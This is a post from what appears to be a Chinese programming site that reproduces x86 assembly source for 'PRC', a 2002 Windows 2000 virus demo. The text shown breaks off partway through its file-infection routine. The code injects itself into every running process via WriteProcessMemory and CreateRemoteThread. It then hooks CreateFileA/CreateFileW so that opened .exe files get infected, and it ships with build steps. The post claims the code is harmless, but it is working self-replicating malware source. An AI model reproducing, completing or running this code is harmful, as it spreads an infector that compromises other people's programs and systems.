Win2k病毒Demo

类别:编程语言 点击:0 评论:0 推荐:

;*********************************************************************
;*                                                                   *
;*                   The program information                         *
;*                                                                   *
;* Program Name: PRC                                                *
;* Current Version: 0.91(not under strict test)                     *
;* Completed on 11-25, 2002                                         *
;*                                                                   *
;* This program is something like a virus. But it does not contain  *
;* any damage code. So it won't do harm to your system. It just     *
;* demonstrates a way of developing a resident virus                *
;* under Windows.                                                   *
;*                                                                   *
;*  You can connect me [[email protected]] for technic discussions      *
;*                                                                   *
;*===================================================================*
;*                                                                   *
;* How to complile this program?                                    *
;*  tasm32 /m /ml pv.asm, pv.obj                                 *
;*  tlink32 -c -M -x -Tpe -ap -S:0x10000 -Sc:0x6000 pv.obj,      *
;*   pv.exe, , kernel32.lib user32.lib                        *
;* The two libraries of kernel32.lib and user32.lib can be          *
;* attained in the BC++5.5 compiler.                                *
;*                                                                   *
;*===================================================================*
;* History                                                          *
;*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;*                                                                   *
;* Version: 0.9                                                     *
;* Completed on 11-25, 2002                                         *
;*                                                                   *
;* 1) It can inject itself into the space of all the active        *
;*  processes in the system if access is permitted.              *
;* 2) It can hook the File Storage API functions of CreateFileA    *
;*  and CreateFileW. If the hook is successfully installed,      *
;*  all file operations that the process makes will be           *
;*  monitored by our code.                                       *
;* 3) It has the ability to infect the PE files with the           *
;*  extension ".exe". After the PE file has been infected,       *
;*  neither its size will increase, nor it will be infected      *
;*  a more time.                                                 *
;*                                                                   *
;*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;*                                                                   *
;* Version: 0.91                                                    *
;* under modification                                               *
;*                                                                   *
;* 1) Use CreateFileMapping and MapViewOfFile instead of ReadFile, *
;*  WriteFile and SetFilePointer to access the target file. The  *
;*  program size become much shorter.                            *
;* 2) Correct the bugs that the file is not closed if the file     *
;*  fails to be infected.                                        *
;*                                                                   *
;*********************************************************************

.386P
.model Flat, Stdcall

; If you want to play with the program, follow me.
; 1) Do change the value of 'DEBUG' unless you know exactly what the option will
;  affect the behavior of the program.
; 2) Compile and run the program.
; 3) Prepare some EXE files and rename them to "*test.exe" style. Wait a few
;  seconds, then search all EXE files containing the string "prcv0.9". If
;  any file has been found, it means the program works! If no file are
;  found, try more other files, because there are some EXE files the program
;  can't infect.
; 4) I develop the program under Windows 2000. I don't know what will happen
;  if it runs under Windows 98 or Windows XP.

;*********************************************************************
 FALSE   = 0
 TRUE   = 1
 DEBUG       = TRUE
 NO_EXCEPTION_HANDLER   = TRUE
 TRACE_REMOTE_THREAD    = 0
 SKIP_CURRENT_PROCESS   = 1
 INFECT_ALL_PROCESSES   = 1
 NOT_INFECT_FILES    = 0
 ERROR_DIAGNOSE     = 0
;*********************************************************************


TH32CS_SNAPMODULE = 00000008h

FILE_BEGIN  = 0
FILE_CURRENT = 1
FILE_END  = 2

OPEN_EXISTING   = 00000003h
if NOT_INFECT_FILES
OPEN_ALWAYS    = 00000004h
endif

FILE_ATTRIBUTE_NORMAL   = 00000080h

FILE_SHARE_READ  = 00000001h
FILE_SHARE_WRITE = 00000002h

GENERIC_READ  = 80000000h
GENERIC_WRITE  = 40000000h

FILE_MAP_WRITE  = 00000002h

MB_PRECOMPOSED  = 00000001h
MB_COMPOSITE  = 00000002h

CP_ACP   = 0
CP_OEMCP  = 1
CP_MACCP  = 2
CP_THREAD_ACP = 3

PAGE_READWRITE = 00000004h

FLAG_IN_DATA_SECTION = 00000001h
FLAG_USE_TWO_SECTIONS = 00000002h

MajorVersion   = 0
MinorVersion   = 9

MAX_PATH = 260


; sizeof(IMAGE_NT_HEADERS)
; Section Header offset   0xF8

; FieldName    Offset
;---------------------------------------------------------------------
; AddressOfEntryPoint  0x28
; SizeOfHeaders   0x54
; SizeOfStackCommit  0x64
; DataDirectory   0x78


;*********************************************************************
;*                                                                   *
;*                         Declare funtion prototype                 *
;*                                                                   *
;*********************************************************************
GetLastError  PROTO
MessageBoxA   PROTO :DWORD, :DWORD, :DWORD, :DWORD
GetModuleHandleA PROTO :DWORD
GetProcAddress  PROTO :DWORD, :DWORD
CreateFileA   PROTO :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
CreateFileW   PROTO :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
CloseHandle   PROTO :DWORD
FindFirstFileA  PROTO :DWORD, :DWORD
FindNextFileA  PROTO :DWORD, :DWORD

printf    PROTO :DWORD


;*********************************************************************
;*                                                                   *
;*                        Entry code section                         *
;*                                                                   *
;*********************************************************************
_TEXT segment use32 public 'CODE'

VirtualEntry:

  call GetLastError

  call GetCurrentEipToEbx
$A:
  ;mov esi, 00400000h
  ;mov eax, [esi+0000003Ch]
  ;lea edi, [esi+eax]
  ;mov edx, [edi+00000080h]
  ;mov eax, [edx+esi]
  ;add eax, esi
  ;mov ecx, [eax+00000010h]

  mov edx, offset GetLastError
  add edx, 2
  mov ecx, [edx]
  sub ecx, 00400000h

  mov eax, offset RvaOfFirstThunkOfKernel32
  sub eax, offset $A
  mov [ebx+eax], ecx

  mov eax, offset OriginalEntryPoint
  sub eax, offset $A
  mov ecx, offset lb_ExitCurrentProcess
  sub ecx, 00400000h
  ;add ebx, eax
  ;push ebp
  ;mov ebp, esp
  ;push 00400000h

  mov [ebx+eax], ecx
  jmp EntryOfVirusCode

lb_ExitCurrentProcess:

  ret

_TEXT ends

;*********************************************************************
;*                                                                   *
;*                        Data section                               *
;*                                                                   *
;*********************************************************************
_DATA segment use32 public 'DATA'

;---- Error Messages
szExceptionCaused  db "Exception error captured!",0
szError      db "Error",0
FileNameToFind  db 'g:\testfile\'
FileNameFound = $
     db '*.exe', 0
     db 260 dup (?)
TestFileW   dw 'G', ':', '\', 'P', 'R', 'O', '\', 'T', 'a', 's', 'm', '\'
     dw 'T', 'e', 's', 't', '.', 'e', 'x', 'e', 0
TestFileA   db 'G:\PRO\TASM\test.exe', 0

W32FindData   db 140h dup(?)

_DATA ends


;*********************************************************************
;*                                                                   *
;*                       Main code section                           *
;*                                                                   *
;*********************************************************************
VirSegment segment use32 public 'PRC'

MAX_WND_SIZE   = 1024
OFFSET_CODING_LENGTH = 10
M      = 3

BaseOfVirusCode = $

;*********************************************************************
;*                                                                   *
;* RestoreCompressedData()                                          *
;*                                                                   *
;* Remarks:                                                         *
;*  Restore the compressed data                                  *
;*                                                                   *
;* Parameters:                                                      *
;*  [Esi]                                                        *
;*  Point to the buffer containing decompression information     *
;*                                                                   *
;* Return Value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************

RestoreCompressedData:

  cld
  mov edi, [ebp][lpImageBaseBaseOfProcess]
  lea edx, [ebx][SizeOfTransmission-@B]
  push edx
  lea ecx, [ebx+VIRUS_VIRTUAL_SIZE][BaseOfVirusCode-@B]
  push ecx
  lodsd
  push eax
  mov edx, edi  ;<
  lodsd    ;<
  add edx, eax  ;< pDataBuffer
  push edx   ;<
       ;<
  call LZ77Decompress

  add edi, [esi]
  mov esi, ecx

  mov ecx, 'HOLD'
SizeOfTransmission = $-4

  push ecx
  push esi
  push PAGE_READWRITE
  mov esi, edi
  call InvokeVirtualProtectEx
  pop esi
  pop ecx

  push ecx
  push edi

  cld
  rep movsb

  pop esi
  pop ecx

  push dword ptr [ebx][dwOldProtect-@B]
  call InvokeVirtualProtectEx

lb_ExitRestoreCompressedData:

  ret


RvaOfEntryPoint = $
  dd (offset EntryOfVirusCode - 00400000h)

RvaOfFirstThunkOfKernel32 = $
  dd 0

DecompressionParametersA = $
 dd 0 ;Total bits afetr compression.
 dd 0 ;Rva of the data buffer where the compressed data are stored in.
 dd 0 ;Rva of the data buffer where the compressed data are restored to.

DecompressionParametersB = $
 dd 0
 dd 0
 dd 0

EntryOfVirusCode:

 XX=-4
lpImageBaseBaseOfProcess  = XX

if NO_EXCEPTION_HANDLER
 XX=XX-4
else
 XX=XX-12
endif

lpImageBaseOfKernel32   = XX
 XX=XX-4
hSnapShot      = XX
 XX=XX-4
hProcessHandle     = XX
 XX=XX-4
lpBaseOfCodeInRemoteProcess  = XX

  pushad
  sub esp, VIRUS_BOOTING_SIZE
  mov edi, esp

  call @A
@A = $
  pop ebx

  lea eax, [ebx][EntryOfVirusCode-@A]
  mov ecx, [ebx][RvaOfEntryPoint-@A]
  sub eax, ecx

  lea esi, [ebx][BaseOfVirusCode-@A]
  mov ecx, VIRUS_PHYSICAL_SIZE
  cld
  rep movsb
  lea ebx, [esp][@B-BaseOfVirusCode]
  jmp ebx

@B = $

  push ebp
  mov ebp, esp

  push eax ; Initialize lpImageBaseBaseOfProcess
  add [ebx][OriginalEntryPoint-@B], eax

; Set up our exception handler. So when any exception occurs,
; our exception handler will get control first, and we can quit
; the virus code safely.
;=====================================================================
ife NO_EXCEPTION_HANDLER
  lea eax, [esp-8]
  xor esi, esi
  xchg eax, fs:[esi]
  lea ecx, [ebx][ExceptionHandler-@B]
  push ecx
  push eax
endif
;=====================================================================

; Let's locate the image base of the module 'Kernel32.dll'.

lb_LoopOfLocateKernel32:

  pop eax
  push eax

  mov ecx, [ebx][RvaOfFirstThunkOfKernel32-@B]
  mov eax, [eax+ecx]
  add [ebx][RvaOfFirstThunkOfKernel32-@B], dword ptr 4

lb_LoopOfCheck64KBoundaries:

  and eax, 0FFFF0000h
  cmp word ptr [eax], 'ZM'
  jnz lb_TryNextBoundary

  mov ecx, [eax+0000003Ch]
  add ecx, eax
  cmp dword ptr [ecx], 00004550h
  jnz lb_TryNextBoundary
  mov edx, [ecx+00000078h]
  add edx, eax
  mov esi, [edx+0000000Ch]
  add esi, eax
  lea edi, [ebx][NameOfKernel32-@B]
  call strcmpi
  jz lb_ImageBaseOfKernel32IsFound
  jmp lb_LoopOfLocateKernel32

lb_TryNextBoundary:

  sub eax, 00010000h
  jmp lb_LoopOfCheck64KBoundaries

lb_ImageBaseOfKernel32IsFound:

  push eax ; Intialize lpImageBaseOfKernel32

  mov esi, edx
  lea edi, [ebx][IfNameTable-@B]

; Let get the entry points of the Windows API functions which
; the virus code must use from the module 'kernel32.dll'.
lb_LoopOfGetEntryAddressOfApiFunctions:

  mov ecx, [edi]
  jecxz lb_AllAddressesGotten

  push eax
  push edi
  lea edi, [ebx+ecx]
  call GetProcedureAddress
  test eax, eax
  jz lb_ExitVirusProgram
  pop edi
  mov [edi][CallAddressTable-IfNameTable], eax
  pop eax
  add edi, 4
  jmp lb_LoopOfGetEntryAddressOfApiFunctions


lb_AllAddressesGotten:

  lea esi, [ebx][DecompressionParametersA-@B]
  call RestoreCompressedData

  jmp lb_NoSecondCompressedSection
JumpOffset = $-1
NextStatement = $

  lea esi, [ebx][DecompressionParametersB-@B]
  call RestoreCompressedData

lb_NoSecondCompressedSection:

;//}


@C = @B
; Now all the entry addresses of the Api functions have been relocated.
; That is very import.
;

; Let's go.
;{
  push 0
  push 2
  call dword ptr [ebx][lpfnCreateToolhelp32Snapshot-@C]
  test eax, eax
  jz lb_AllProcessesEnumerated

  push eax ; Initialize hSnapShot

  lea eax, [ebx][ProcessEntry32-@C]
  mov dword ptr [eax], 00000128h
  push eax
  push dword ptr [ebp][hSnapShot]
  call dword ptr [ebx][lpfnProcess32First-@C]
  test eax, eax
  jz lb_AllProcessesEnumerated

lb_LoopOfEnumerateAllProcesses:

ife INFECT_ALL_PROCESSES
 ife SKIP_CURRENT_PROCESS
  lea esi, [ebx][pe_szExeFile-@C]
  lea edi, [ebx][TargetProcessName-@C]
  call strcmpi
  jz lb_TryNextProcess

  call [ebx][lpfnGetCurrentProcessId-@C]
  cmp eax, [ebx][pe_th32ProcessID-@C]
  jnz lb_TryNextProcess
 else
  lea esi, [ebx][pe_szExeFile-@C]
  lea edi, [ebx][TargetProcessName-@C]
  call strcmpi
  jnz lb_TryNextProcess
 endif
endif

lb_TargetProcessFound:

  mov eax, [ebx][pe_th32ProcessID-@C]
  push eax
  push 0
  push 001F0FFFh ; PROCESS_ALL_ACCESS
  call [ebx][lpfnOpenProcess-@C]
  test eax, eax
  jz lb_TryNextProcess

  push eax ; Initailize hProcessHandle

  push 00000004h ; PAGE_READWRITE
  push 00001000h ; MEM_COMMIT
  push VIRUS_ALIGN_SIZE
  push 0
  push eax
  call [ebx][lpfnVirtualAllocEx-@C]
   ;push eax   ;<
   ;call GetLastError ;< Debug Code
   ;pop eax   ;<
  test eax, eax
  jz lb_ExitVirusProgram

  xchg eax, esi
  push esi ; lpBaseOfCodeInRemoteProcess
  lea edi, [ebx][ReturnValueFromRemoteProcess-@C]

  xor edx, edx
  mov [edi], edx ; Initialize return value
  push edx
  push VIRUS_ALIGN_SIZE
  lea ecx, [ebx][BaseOfVirusCode-@C]
  push ecx
  push esi
  push dword ptr [ebp][hProcessHandle]
  call [ebx][lpfnWriteProcessMemory-@C]
  test eax, eax
  jz lb_ExitVirusProgram

ife SKIP_CURRENT_PROCESS
  push ebx
endif

  xor ecx, ecx
  push ecx
  push ecx
  push ecx
  lea edx, [esi][RemoteThread-BaseOfVirusCode]
  push edx
  push ecx
  push ecx
  push dword ptr [ebp][hProcessHandle]
  call [ebx][lpfnCreateRemoteThread-@C]
  ;test eax, eax
  ;jz lb_ExitVirusProgram
ife SKIP_CURRENT_PROCESS
  pop ebx
endif

  push dword ptr [ebp][hProcessHandle]
  call [ebx][lpfnCloseHandle-@C]

lb_TryNextProcess:

  lea eax, [ebx][ProcessEntry32-@C]
  push eax
  push dword ptr [ebp][hSnapShot]
  call dword ptr [ebx][lpfnProcess32Next-@C]
  test eax, eax
  jz lb_ExitVirusProgram

  jmp lb_LoopOfEnumerateAllProcesses

lb_AllProcessesEnumerated:

  push dword ptr [ebp][hSnapShot]
  call [ebx][lpfnCloseHandle-@C]

lb_ExitVirusProgram:

  ;jmp lb_DirectlyExitVirusProgram

lb_DirectlyExitVirusProgram:

ife NO_EXCEPTION_HANDLER
  pop dword ptr fs:[0]
  pop ecx
endif
  mov esp, ebp
  pop ebp

  add esp, VIRUS_BOOTING_SIZE
  popad

  push offset lb_ExitCurrentProcess
OriginalEntryPoint = $-4
  ret


;*********************************************************************
;*                                                                   *
;* Get the current EIP into EAX. You can use this way to locate     *
;* the virus code.                                                  *
;*                                                                   *
;*********************************************************************
GetCurrentEipToEax:

  pop eax
  jmp eax

;*********************************************************************
;*                                                                   *
;* Get the current EIP into EBX. You can use this way to locate     *
;* the virus code.                                                  *
;*                                                                   *
;*********************************************************************
GetCurrentEipToEbx:

  pop ebx
  jmp ebx


;*********************************************************************
;*                                                                   *
;* strcmpi()                                                        *
;*                                                                   *
;* Remarks:                                                         *
;*  This routine compare two strings, case-insensitive.          *
;*                                                                   *
;* Parameters:                                                      *
;*  [ESI]                                                        *
;*  Point to string1.                                            *
;*  [EDI]                                                        *
;*  Point to string2                                             *
;*                                                                   *
;* Return Value:                                                    *
;*  If these two strings are identical,                          *
;*  ZF flag will be set.                                         *
;*  If these two strings are not identical,                      *
;*  ZF flag will be cleared.                                     *
;*                                                                   *
;*********************************************************************
strcmpi:

  push esi
  push edi
  push eax
  push ecx

  xor eax, eax
  xor ecx, ecx

lb_LoopOfCompareStrings:
  mov al, [esi]
  mov cl, [edi]
  inc esi
  inc edi

  cmp eax, 'A'
  jb lb_NotAsciiCharacter

  cmp eax, 'z'
  ja lb_NotAsciiCharacter

  cmp eax, 'Z'
  jbe lb_IsAsciiCharacter

  cmp eax, 'a'
  jae lb_IsAsciiCharacter

  jmp lb_NotAsciiCharacter

lb_IsAsciiCharacter:
; if the character is a ascii character, just convert it to lower-case.
  or eax, 20h
  or ecx, 20h

lb_NotAsciiCharacter:

  cmp eax, ecx
  jnz lb_StringsNotEqual
  jecxz lb_StringsIsEqual
  jmp lb_LoopOfCompareStrings

lb_StringsIsEqual:
lb_StringsNotEqual:

  pop ecx
  pop eax
  pop edi
  pop esi

  ret

;*********************************************************************
;*                                                                   *
;* IsAllZero()                                                      *
;*  [Param1]                                                     *
;*  [Param2]                                                     *
;*                                                                   *
;* Remarks:                                                         *
;*  This routine check if the contents of a specified buffer     *
;*  are all zero.                                                *
;*                                                                   *
;* Parameters:                                                      *
;*  [Param1]                                                     *
;*  Point to the buffer.                                         *
;*  [Param2]                                                     *
;*  The size of the buffer.                                      *
;*                                                                   *
;* Return Value:                                                    *
;*  If the buffer is all filled with Zero,                       *
;*  Z-flag will be set.                                          *
;*  If the buffer is not all filled with Zero,                   *
;*  Z-flag will be cleared.                                      *
;*                                                                   *
;*********************************************************************
IsAllZero:

  push esi
  push ecx
  push eax
  xor eax, eax

  mov esi, [esp+00000010h]
  mov ecx, [esp+00000014h]

  cld
lp_GetNextByteToCompare:

  lodsb
  test eax, eax
  jnz lb_ExitIsAllZero
  loop lp_GetNextByteToCompare

lb_ExitIsAllZero:

  pop eax
  pop ecx
  pop esi
  ret 8

;*********************************************************************
;*                                                                   *
;* RvaAddressToFileMappingAddress()                                 *
;*                                                                   *
;* Remarks:                                                         *
;*  This routine converts the RVA address to the file            *
;*  offset address.                                              *
;*                                                                   *
;* Parameters:                                                      *
;*  [Eax]                                                        *
;*  The RVA address                                              *
;*                                                                   *
;* Return Value:                                                    *
;*  If the RVA address can be converted, the file offset         *
;*  address will be returned in EAX. Otherwise, NULL will be     *
;*  returned in EAX.                                             *
;*                                                                   *
;*********************************************************************
RvaAddressToFileMappingAddress:

  push esi
  mov esi, [ebp][lpNtHeaders] ; Get Nt Heads

  movzx ecx, word ptr [esi+00000006h]
  lea esi, [esi+0000000F8H]

lp_CheckAllSections:

  mov edx, [esi+0000000Ch]

  cmp eax, edx
  jb lb_CheckNextSection

  add edx, [esi+00000010h]
  cmp eax, edx
  jae lb_CheckNextSection

  sub eax, [esi+0000000Ch]
  add eax, [esi+00000014h]
  add eax, [ebp][lpFileMapping]
  jmp lb_QuitRvaToFilePointer

lb_CheckNextSection:

  add esi, 00000028h ;40
  loop lp_CheckAllSections

  xor eax, eax

lb_QuitRvaToFilePointer:

  pop esi
  ret


;*********************************************************************
;*                                                                   *
;* InstallApiHook()                                                 *
;*  [Param1]                                                     *
;*  [Param2]                                                     *
;*                                                                   *
;* Remarks:                                                         *
;*  The routine tries to install a hook on the specified         *
;*  Windows API function.                                        *
;*                                                                   *
;* Parameters:                                                      *
;*  [Eax]                                                        *
;*  The image base of the module on which the hook function      *
;*  will be installed.                                           *
;*  [Edx]                                                        *
;*  The RVA of the import descriptor array.                      *
;*  [Esi]                                                        *
;*  Point to the string which contains the name of the API       *
;*  function on which the hook will be installed.                *
;*  [Param1]                                                     *
;*  The entry address of the hook of the API function.           *
;*  [Param2]                                                     *
;*  Point to the variable which saves the original entry         *
;*  address of the API function.                                 *
;*                                                                   *
;* Return Value:                                                    *
;*  If the hook has been successfully installed on the API       *
;*  function, CF flag will be set. Otherwise, CF flag will       *
;*  be cleared.                                                  *
;*                                                                   *
;*********************************************************************
InstallApiHook:

PARAMETERS_BASE = 4 + 3*4

  push eax
  push edx
  push esi
  push edi

lb_LoopOfCheckImportDescriptors:
  push (SIZE_OF_IMPORT_DESCRIPTOR)
  push edx
  call IsAllZero
  jz lb_ApiHookInstallationFail

  mov ecx, [edx]
  jecxz lb_TryNextImportDescriptor

  add ecx, eax

lb_LoopOfCheckDataThunks:

  mov edi, [ecx]
  test edi, edi
  jz lb_TryNextImportDescriptor
  test edi, 80000000h
  jnz lb_TryNextDataThunk

  add edi, eax
  inc edi
  inc edi
  call strcmpi
  jz lb_ApiFunctionIsFound

lb_TryNextDataThunk:

  add ecx, 4
  jmp lb_LoopOfCheckDataThunks

lb_TryNextImportDescriptor:

  add edx, SIZE_OF_IMPORT_DESCRIPTOR
  jmp lb_LoopOfCheckImportDescriptors

lb_ApiFunctionIsFound:

  mov edi, [edx+00000010h]
  sub edi, [edx]
  add ecx, edi

  push PAGE_READWRITE
  mov esi, ecx
  xor ecx, ecx
  call InvokeVirtualProtectEx
  test eax, eax
  jz lb_ApiHookInstallationFail

  mov eax, [esi]     ;<
  mov ecx, [esp+00000014h]  ;<
  mov edx, [ecx]                  ;<
  cmp [eax], edx     ;<
  jz lb_ApiHookAlreadyInstalled ;<

  mov edx, [esp+00000018h]  ;< Save the original entry address of
  mov [edx], eax     ;< the API function

  mov [esi], ecx     ;Modify the entry address of the API function

  push dword ptr [ebx][dwOldProtect-@X]
  xor ecx, ecx
  call InvokeVirtualProtectEx
  test eax, eax
  jz lb_ApiHookInstallationFail

  stc
  jmp lb_ExitInstallApiHook


lb_ApiHookInstallationFail:
lb_ApiHookAlreadyInstalled:

  clc

lb_ExitInstallApiHook:

  pop edi
  pop esi
  pop edx
  pop eax
  ret 8


;*********************************************************************
;*                                                                   *
;* Remarks:                                                         *
;*  The rountine run in the context of a remote process. It will *
;*  try to install a hook on the API functions of CreateFileA    *
;*  and CreateFileW                                              *
;*                                                                   *
;* Parameters:                                                      *
;*  [Param1]:                                                    *
;*  The thread which call CreateRemoteThread to create this      *
;*  thread pass the parameter. The parameter is not used here.   *
;*                                                                   *
;* Return Value:                                                    *
;*  If the hooks have been successfully installed, the return    *
;*  value is 1, otherwise -1 will be returned.                   *
;*                                                                   *
;*********************************************************************
 XX=-4
hSnapShotOfModuleEnumeration = XX
 XX=XX-4
lpModuleEntry32     = XX
 XX=XX-4
dwReturnValue     = XX
 XX=XX-4

RemoteThread:

; The follow statements looks like a dead loop. Yes, it is so.
; But they are helpful in tracing the thread in the remote process.
; When the thread is created in the remote process, it will
; immediately runes into the dead-loop. It won't go out unitil
; somebody help it. First you can activate the process in the
; context of whom the thread has been created. Now you can
; activate SoftIce by pressing CTRL+D. You have a very big chance
; to get the breakpoint which is exactly located in the dead-loop.
; Now you can modify ECX register to any non-zero value. The
; dead loop no longer exists. And you can trace thread in the
; context of the remote process.
if TRACE_REMOTE_THREAD
  xor ecx, ecx
  jecxz $
endif

  push ebp
  mov ebp, esp

  call GetCurrentEipToEbx
@Xd:
  add ebx, @X - @Xd

  push 0
  push TH32CS_SNAPMODULE
  call [ebx][lpfnCreateToolhelp32Snapshot-@X]
  test eax, eax
  jz lb_ExitRemoteThread

  push eax ;Initialzie hSnapShotOfModuleEnumeration

  lea edi, [ebx][ModuleEntry32-@X]
  mov dword ptr [edi], 00000224h
  push edi ;Initialize lpModuleEntry32
  push -1  ;Initialize dwReturnValue

  push edi
  push eax
  call [ebx][lpfnModule32First-@X]
  test eax, eax
  jz lb_ExitRemoteThread

lb_LoopOfEnumerateModulesOfCurrentProcess:

  mov eax, [edi][me_modBaseAddr-ModuleEntry32]
  mov ecx, [eax+0000003Ch]
  lea edx, [eax+ecx]
  mov ecx, [edx+00000080h]
  jecxz lb_TryNextModule
  lea edx, [eax+ecx]

  ;push 247C8B60h
  lea esi, [ebx][n_CreateFileW-@X]
  lea ecx, [ebx][OriginalEntryOfCreateFileW-@X]
  push ecx
  lea ecx, [ebx][HookOfCreateFileW-@X]
  push ecx
  call InstallApiHook
  jnc lb_TryToInstallHookOnCreateFileA

  push 1
  pop dword ptr [ebp][dwReturnValue]

lb_TryToInstallHookOnCreateFileA:

  ;push 24748B60h
  lea esi, [ebx][n_CreateFileA-@X]
  lea ecx, [ebx][OriginalEntryOfCreateFileA-@X]
  push ecx
  lea ecx, [ebx][HookOfCreateFileA-@X]
  push ecx
  call InstallApiHook
  jnc lb_TryNextModule

  push 1
  pop dword ptr [ebp][dwReturnValue]

lb_TryNextModule:

  push edi
  push dword ptr [ebp][hSnapShotOfModuleEnumeration]
  call [ebx][lpfnModule32Next-@X]
  test eax, eax
  jz lb_ExitRemoteThread

  jmp lb_LoopOfEnumerateModulesOfCurrentProcess

lb_ExitRemoteThread:

  push dword ptr [ebp][hSnapShotOfModuleEnumeration]
  call [ebx][lpfnCloseHandle-@X]

  pop eax
  mov esp, ebp
  pop ebp

  cmp eax, 1
  jz lb_ApiHookSuccessfullyinstalled

  pop ecx
  pop edx
  push 00004000h
  push VIRUS_ALIGN_SIZE
  lea edx, [ebx][BaseOfVirusCode-@X]
  push edx
  push -1
  push ecx
  jmp [ebx][lpfnVirtualFreeEx-@X]

lb_ApiHookSuccessfullyinstalled:

  mov byte ptr [ebx][IsBusy-@X], 0 ; Initialize the Busy Flag
  ret 04

;*********************************************************************
;*                                                                   *
;* InvokeVirtualProtectEx()                                         *
;*  [Param1]                                                     *
;*                                                                   *
;* Remarks:                                                         *
;*  Invoke the Windows API function of VirtualProtectEx to       *
;*  change R/W access of the specified memory block.             *
;*                                                                   *
;* Parameters:                                                      *
;*  [Esi]:                                                       *
;*  Pointer to the start address of the buffer whose R/W access  *
;*  will be changed.                                             *
;*  [Ecx]:                                                       *
;*  The size of the buffer.                                      *
;*  [Param1]:                                                    *
;*  New R/W access for the buffer.                               *
;*                                                                   *
;* Return Value:                                                    *
;*  The value returned returned from VirtualProtectEx.           *
;*                                                                   *
;*********************************************************************
InvokeVirtualProtectEx:

  call GetCurrentEipToEax
@8 = $
  pop dword ptr [eax][ReturnFromInvokeVirtualProtectEx-@8]
  add eax, dwOldProtect - @8

  pop edx
  push eax
  push edx
  test ecx, ecx
  jnz lb_UseSpecifiedSize
  mov ecx, 00001000h
lb_UseSpecifiedSize:
  push ecx
  mov edx, esi
  and edx, 0FFFFF000h
  push edx
  push -1
  call dword ptr [eax][lpfnVirtualProtectEx-dwOldProtect]

  push 'HOLD'
ReturnFromInvokeVirtualProtectEx = $-4
  ret


;*********************************************************************
;*
;* Hook functions on the API functions of CreateFileA and
;* CreateFileW. When someting want to call the API function of
;*  CreateFileA or CreateFileW anyway, our hook functions will get
;* called first. You can do anything you want in the hook
;* functions. And then you will call the real CreateFileA or
;* CreateFileW function which is exported by kernel32.dll to
;* complete the file creation request.
;*
;*********************************************************************
;HANDLE CreateFile(
;  LPCTSTR lpFileName,                         // file name
;  DWORD dwDesiredAccess,                      // access mode
;  DWORD dwShareMode,                          // share mode
;  LPSECURITY_ATTRIBUTES lpSecurityAttributes, // SD
;  DWORD dwCreationDisposition,                // how to create
;  DWORD dwFlagsAndAttributes,                 // file attributes
;  HANDLE hTemplateFile                        // handle to template file
;  )
;  The stack is like the following figure when FindFirstFile is called
;  ______________________________
; |       Return Address         | <<== ESP (Low Address)
; |______________________________|
; |         lpFileName           |
; |______________________________|
; |        dwDesiredAccess       |
; |______________________________|
; |          dwShareMode         |
; |______________________________|
; |     lpSecurityAttributes     |
; |______________________________|
; |     dwCreationDisposition    |
; |______________________________|
; |     dwFlagsAndAttributes     |
; |______________________________|
; |        hTemplateFile         |
; |______________________________|
;
;
; After PUSHAD statement is executed, the stack looks like this:
;  ______________________________
; |             EDI              | 000h: | <<== ESP
; |______________________________|       |
; |             ESI              | 004h: |
; |______________________________|       |
; |             EBP              | 008H  |
; |______________________________|       |
; |             ESP              | 00CH  |   pushad
; |______________________________|       |
; |             EDX              | 010h  |
; |______________________________|       |
; |             ECX              | 014H  |
; |______________________________|       |
; |             EBX              | 018H  |
; |______________________________|       |
; |             EAX              | 01CH  |
; |______________________________|       |__
; |       Return Address         | 020H
; |______________________________|
; |         lpFileName           | 024h
; |______________________________|
; |        dwDesiredAccess       | 028h
; |______________________________|
; |          dwShareMode         | 02CH
; |______________________________|
; |     lpSecurityAttributes     | 030H
; |______________________________|
; |     dwCreationDisposition    | 034H
; |______________________________|
; |     dwFlagsAndAttributes     | 038H
; |______________________________|
; |        hTemplateFile         | 03CH
; |______________________________|


HookOfCreateFileW:

  pushad

  mov edi, [esp+00000024h]
  call InfectPeFile

  popad
  push 'Hold'
OriginalEntryOfCreateFileW = $-4
  ret


HookOfCreateFileA:

  pushad
  mov esi, [esp+00000024h]
  call GetCurrentEipToEax
@0:
  lea edi, [eax+00001000h][BaseOfVirusCode-@0]
  ;lea edi, [eax+00000E00h][BaseOfVirusCode-@0]

  push 0000200h
  push edi
  push -1
  push esi
  ;push MB_PRECOMPOSED
  push MB_COMPOSITE
  push CP_THREAD_ACP
  call [eax][lpfnMultiByteToWideChar-@0]
  test eax, eax
  jz lb_ExitHookOfCreateFileA

  call InfectPeFile

lb_ExitHookOfCreateFileA:

  popad
  push 'Hold'
OriginalEntryOfCreateFileA = $-4
  ret

;*********************************************************************
;*                                                                   *
;* InfectPeFile()                                                   *
;*                                                                   *
;* Remarks:                                                         *
;*  Infect the specified PE file with our virus code.            *
;*                                                                   *
;* Parameters:                                                      *
;*  [Edi]                                                        *
;*  Point to a null-terminated wide-character string containing  *
;*  the PE file name.                                            *
;*                                                                   *
;* Return Value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************
  X=-4
  XX=-4
tmpVar       = XX
dwNumberOfBytesRead    = (tmpVar)
dwNumberOfBytesWritten   = (tmpVar)
  XX=XX-4
i        = XX
ulAddressOfVCode    = XX
  XX=XX-4
pSectionOfOriginalDataAndCode = XX

DWORDSofCompressionInfo  = 6

  XX=(XX)-(4*DWORDSofCompressionInfo)
CompressionInfoAA    = XX
  XX=(XX)-(4*DWORDSofCompressionInfo)
CompressionInfoBB    = XX
   off_pSection    = 0000h
   off_OriginalVirtualAddress = 0004h
   off_pCompressedDataBuffer = 0008h
   off_ulNumTotalBits   = 000Ch
   off_ulNumUsedBytes   = 0010h
   off_ulNumFreeBytes   = 0014h
  XX=XX-4
  SIZE_OF_LOCAL_VARS=X-XX

lpszFileNameToOpen      = XX
  XX=XX-4
hFileHandle        = XX
  XX=XX-4
hFileMappingHandle      = XX
  XX=XX-4
lpFileMapping       = XX
  XX=XX-4
dwTotalFileSize       = XX
  XX=XX-4
lpNtHeaders        = XX
  XX=XX-4
ulInformation       = XX
  XX=XX-4

InfectPeFile:

  push ebp
  mov ebp, esp

  call GetCurrentEipToEbx
RelocE = $
  add ebx, @X - RelocE

  lea eax, [ebx][IsBusy-@X]
